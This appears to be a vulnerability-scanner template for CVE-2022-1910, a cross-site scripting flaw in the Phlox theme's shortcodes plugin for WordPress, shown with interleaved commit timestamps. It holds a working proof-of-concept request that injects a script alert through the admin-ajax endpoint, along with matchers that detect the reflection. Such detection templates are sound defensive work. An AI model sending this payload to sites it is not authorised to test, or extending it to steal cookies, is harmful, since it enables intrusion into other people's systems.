2022-09-27 07:33:21 +00:00
id : CVE-2022-1910
info :
2022-10-19 21:11:27 +00:00
name : WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting
2022-09-27 07:33:21 +00:00
author : Akincibor
severity : medium
description : |
2022-10-19 21:11:27 +00:00
WordPress Shortcodes and extra features plugin for the Phlox theme before 2.9.8 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-09-27 07:33:21 +00:00
reference :
- https://wpscan.com/vulnerability/8afe1638-66fa-44c7-9d02-c81573193b47
- https://wordpress.org/plugins/auxin-elements/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1910
classification :
2022-09-30 15:17:41 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-27 07:33:21 +00:00
cve-id : CVE-2022-1910
2022-09-30 15:17:41 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:averta:shortcodes_and_extra_features_for_phlox_theme:*:*:*:*:*:*:*:*
epss-score : 0.00071
2022-09-27 07:33:21 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2022-09-30 15:17:41 +00:00
tags : wordpress,xss,auxin-elements,wpscan,cve,cve2017,wp-plugin,wp
2022-09-27 07:33:21 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-27 07:33:21 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'widget-title"><script>alert(document.domain)</script></h3>'
- 'aux-widget'
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-10-19 21:11:27 +00:00
# Enhanced by md on 2022/10/17